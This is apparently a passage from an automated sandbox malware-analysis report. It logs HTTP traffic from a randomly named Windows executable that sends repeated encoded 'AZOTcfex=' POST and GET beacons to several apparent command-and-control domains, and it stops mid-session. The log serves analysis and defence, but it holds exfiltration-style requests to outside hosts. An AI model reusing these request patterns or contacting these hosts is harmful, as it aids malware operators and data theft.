                Data Ascii: AZOTcfex=zHwxZv4P/D2M8nwIQEM2AlJET55S150oU32VMw7boF7tvuWWeHMjxkMF7UAlulr6XY/4WSyVQM6mDyUtm+DCxMnU0hJRozqK53QvBtD22d+rnzSC2c3KbPe7uAj3EjVFWZszSU4WEq3Kkk0CLYPjOZOtXi6nPIE5QPKJRro/NtmlHssO8p4P/gKz2QSgxFFOH0w4ORJyMD8I4q7Dy/Rqpn4=
                Aug 23, 2024 04:19:52.981643915 CEST | 1236 | IN | HTTP/1.1 200 OK
                Server: nginx
                Date: Fri, 23 Aug 2024 02:19:52 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                X-Powered-By: PHP/8.1.29
                Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                Aug 23, 2024 04:19:52.981703997 CEST | 1236 | IN | Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                Aug 23, 2024 04:19:52.981740952 CEST | 1236 | IN | Data Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
                Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                Aug 23, 2024 04:19:52.981776953 CEST | 672 | IN | Data Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e
                Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                Aug 23, 2024 04:19:52.981818914 CEST | 1236 | IN | Data Raw: 65 74 20 73 74 61 72 74 65 64 20 77 69 74 68 20 79 6f 75 72 20 77 65 62 73 69 74 65 2c 20 65 6d 61 69 6c 2c 20 62 6c 6f 67 20 61 6e 64 20 6f 6e 6c 69 6e 65 20 73 74 6f 72 65 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 0a 09 09 09 3c 75 6c 3e 0a 09 09 09
                Data Ascii: et started with your website, email, blog and online store.</p><p><ul><li><a href="https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=wordpress">Create your websi
                Aug 23, 2024 04:19:52.981851101 CEST | 206 | IN | Data Raw: 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 73 75 70 70 6f 72 74 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70
                Data Ascii: loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb">Contact us</a></p></span></div>... /END #footer --></div>... /END .content --></body></html>0


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                15 | 192.168.2.4 | 49752 | 194.9.94.85 | 80 | 2412 | C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 23, 2024 04:19:54.846965075 CEST | 10898 | OUT | POST /4hda/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.xn--matfrmn-jxa4m.se
                Origin: http://www.xn--matfrmn-jxa4m.se
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 10305
                Referer: http://www.xn--matfrmn-jxa4m.se/4hda/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 41 5a 4f 54 63 66 65 78 3d 7a 48 77 78 5a 76 34 50 2f 44 32 4d 38 6e 77 49 51 45 4d 32 41 6c 4a 45 54 35 35 53 31 35 30 6f 55 33 32 56 4d 77 37 62 6f 46 6a 74 76 62 43 57 66 6b 30 6a 77 6b 4d 46 67 55 42 69 75 6c 71 34 58 59 33 38 57 53 2b 76 51 4f 53 6d 43 58 41 74 6b 4c 33 43 6f 38 6e 55 32 68 4a 51 73 7a 72 65 35 33 41 72 42 74 7a 32 32 64 2b 72 6e 78 4b 43 67 2b 66 4b 55 76 66 4a 70 41 6a 7a 54 7a 55 69 57 5a 31 4c 53 55 38 73 45 61 58 4b 6b 41 51 43 59 4c 33 6a 4e 35 4f 76 51 69 37 69 50 49 4a 35 51 4f 6e 6c 52 75 55 56 4e 76 36 6c 57 39 73 52 6a 4e 49 4f 73 67 47 4b 31 52 32 52 39 32 56 54 66 30 78 45 44 7a 68 53 64 32 63 46 79 72 65 6f 72 38 4e 62 37 79 50 6d 65 6d 33 2f 67 39 6b 52 5a 36 38 36 4f 59 64 4e 42 77 5a 6d 79 6a 35 78 33 51 2b 79 77 30 51 6e 6d 66 64 70 46 41 75 46 70 58 42 32 45 51 31 78 62 59 72 31 66 59 2b 45 6b 45 46 66 33 51 54 58 69 70 4b 35 69 6b 2f 52 74 4a 49 66 58 53 2b 76 64 53 32 52 6b 75 64 67 6f 30 6c 6e 6a 6b 6c 67 7a 43 32 6e 32 49 4b 30 5a 32 46 62 6e 75 5a 49 6b [TRUNCATED]
                Data Ascii: AZOTcfex= [TRUNCATED]
                Aug 23, 2024 04:19:55.506321907 CEST | 1236 | IN | HTTP/1.1 200 OK
                Server: nginx
                Date: Fri, 23 Aug 2024 02:19:55 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                X-Powered-By: PHP/8.1.29
                Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                Aug 23, 2024 04:19:55.506383896 CEST | 1236 | IN | Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                Aug 23, 2024 04:19:55.506421089 CEST | 1236 | IN | Data Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
                Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                Aug 23, 2024 04:19:55.506455898 CEST | 1236 | IN | Data Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e
                Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                Aug 23, 2024 04:19:55.506496906 CEST | 878 | IN | Data Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68
                Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                16 | 192.168.2.4 | 49753 | 194.9.94.85 | 80 | 2412 | C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 23, 2024 04:19:57.828607082 CEST | 518 | OUT | GET /4hda/?AZOTcfex=+FYRabRorC7iiipdZ2F3S2JpD5gx1+4XHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9+fjZ9jEj5Dze7n0KBNuQ8eKVrjet+eDbX/8=&bB7L5=DPt0-rQpMXpt HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.xn--matfrmn-jxa4m.se
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Aug 23, 2024 04:19:58.472203016 CEST | 1236 | IN | HTTP/1.1 200 OK
                Server: nginx
                Date: Fri, 23 Aug 2024 02:19:58 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                X-Powered-By: PHP/8.1.29
                Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                Aug 23, 2024 04:19:58.472410917 CEST | 224 | IN | Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.
                Aug 23, 2024 04:19:58.472443104 CEST | 1236 | IN | Data Raw: 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 20 3d 20 31 2e 30 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65
                Data Ascii: 0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/responsive/styles/reset.css" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/shared/style/
                Aug 23, 2024 04:19:58.472498894 CEST | 1236 | IN | Data Raw: 67 69 6e 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 67 69 6e 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61
                Data Ascii: gin to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=login">Loopia Customer zone</a> and actualize your plan.</p> <div class="divider"></div>
                Aug 23, 2024 04:19:58.472532988 CEST | 1236 | IN | Data Raw: 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62 6c 65 20 74 6f 20 6d 61 6e 61 67 65 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 69 6e 20 6f 6e 65 20 73 69 6e 67 6c 65 20 70 6c 61 63 65 20 69 6e 20 4c 6f 6f 70 69 61 20 43 75 73 74 6f 6d 65 72 20
                Data Ascii: S, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=dns">Read more at loopia.co
                Aug 23, 2024 04:19:58.472567081 CEST | 654 | IN | Data Raw: 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72 20 77 65 62 20 68 6f 73 74 69 6e 67
                Data Ascii: m_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loopia.se?utm_me


                Session ID: 17 | Source IP: 192.168.2.4 | Source Port: 49754 | Destination IP: 23.251.54.212 | Destination Port: 80 | PID: 2412 | Process: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                Timestamp: Aug 23, 2024 04:20:03.935277939 CEST | Bytes transferred: 763 | Direction: OUT | Data:
                POST /li0t/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.anuts.top
                Origin: http://www.anuts.top
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 205
                Referer: http://www.anuts.top/li0t/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Ascii: AZOTcfex=RXwfOcHa9T4Mpn/yRQhYjJbVVIsh32JdFO0SSmNU3uRWSn7x3BFiHUjPi8l4CKmufuCpkwc+g7o+FeaCvo5evyniUr8TMjJxuBAFpS5EaEVh5zCiG8CpFKLuwTXi6kly2JJN3AsSB7ges1utpw15k9UGUs5T5Y9l38NVYF76zHtC2NVBmDE4k7TEgYJuNwMEHQ==


                Session ID: 18 | Source IP: 192.168.2.4 | Source Port: 49755 | Destination IP: 23.251.54.212 | Destination Port: 80 | PID: 2412 | Process: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                Timestamp: Aug 23, 2024 04:20:06.637464046 CEST | Bytes transferred: 783 | Direction: OUT | Data:
                POST /li0t/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.anuts.top
                Origin: http://www.anuts.top
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 225
                Referer: http://www.anuts.top/li0t/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Ascii: AZOTcfex=RXwfOcHa9T4MoHvyX39Y2ZbWQIsh8WJBFO4SSnJi2YBWSGLx2DtiAUjPsckyc6mpfuGhk1k+g78+FaWCv7hRuingMb8dIjJxuBAFpS8ZaAxh4DSiFY2ub6LpmjXip0l22JJ/3FI0B9keswKtqh16/NUMKc4n3LI11N4JW2P51ncn6rEb3ylv27339fAaAzxNcWsffKBEnpXN8Bg+X9feRoM=


                Session ID: 19 | Source IP: 192.168.2.4 | Source Port: 49756 | Destination IP: 23.251.54.212 | Destination Port: 80 | PID: 2412 | Process: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                Timestamp: Aug 23, 2024 04:20:09.178349018 CEST | Bytes transferred: 10865 | Direction: OUT | Data:
                POST /li0t/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.anuts.top
                Origin: http://www.anuts.top
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 10305
                Referer: http://www.anuts.top/li0t/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Ascii: AZOTcfex= [TRUNCATED]


                Session ID: 20 | Source IP: 192.168.2.4 | Source Port: 49757 | Destination IP: 23.251.54.212 | Destination Port: 80 | PID: 2412 | Process: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                Timestamp: Aug 23, 2024 04:20:11.719743013 CEST | Bytes transferred: 507 | Direction: OUT | Data:
                GET /li0t/?bB7L5=DPt0-rQpMXpt&AZOTcfex=cVY/NretpRV3pSqaegFyh+jFAYxH5xF9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfnjThT7p1YiNwwCR+sQ8vfCBR1TGxYf2LNfg= HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.anuts.top
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36


                Session ID: 21 | Source IP: 192.168.2.4 | Source Port: 49758 | Destination IP: 199.192.19.19 | Destination Port: 80 | PID: 2412 | Process: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                Timestamp: Aug 23, 2024 04:20:38.155503988 CEST | Bytes transferred: 775 | Direction: OUT | Data:
                POST /ei85/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.telwisey.info
                Origin: http://www.telwisey.info
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 205
                Referer: http://www.telwisey.info/ei85/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Ascii: AZOTcfex=DTOKciQymv5BKJPNnpMdZc+SHA8TErrFnmydaMNwroMJ0K//6QUyT3VFYEiKcJx2CE+n0cts7L5paW2wHvRPmSp2CgzgvBTnj18tMklHYhd1oEGMP+lutG6MI8RGhYBSOKLK3Q76fsb5MCfWnVtk3Y1yxRXl9+J34NKW/08Q7aou5IDFwIw0W/4jDnt68m/tiA==


                Session ID: 22 | Source IP: 192.168.2.4 | Source Port: 49759 | Destination IP: 199.192.19.19 | Destination Port: 80 | PID: 2412 | Process: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                Timestamp: Aug 23, 2024 04:20:40.693533897 CEST | Bytes transferred: 795 | Direction: OUT | Data:
                POST /ei85/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.telwisey.info
                Origin: http://www.telwisey.info
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 225
                Referer: http://www.telwisey.info/ei85/
